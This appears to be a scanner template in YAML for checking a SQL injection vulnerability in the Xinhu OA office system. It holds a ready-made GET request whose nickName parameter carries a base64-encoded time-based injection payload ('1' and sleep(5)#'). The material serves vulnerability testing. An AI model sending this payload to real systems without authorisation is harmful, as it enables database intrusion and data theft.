keyword: 信呼OA
name: 信呼OA SQL注入漏洞
description: | # 下一行可填写漏洞描述
  信呼OA办公系统是一款开源的且跨平台的办公系统。
requests: # 为空代表默认或者不启用
  path: "/index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw=="
  method: GET
  headers:
    X-Forwarded-For: 
  body-raw: |- # 如果需要发送请求体，在下一行开始填写
    
response: 
  path: "" # 不填则默认接收此请求的响应包
  status-code: 200
  body: " "  # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
  time:     # 此处填写响应包响应时间，默认不启用
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: | # 下一行可填写漏洞影响
  信呼OA办公系统存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。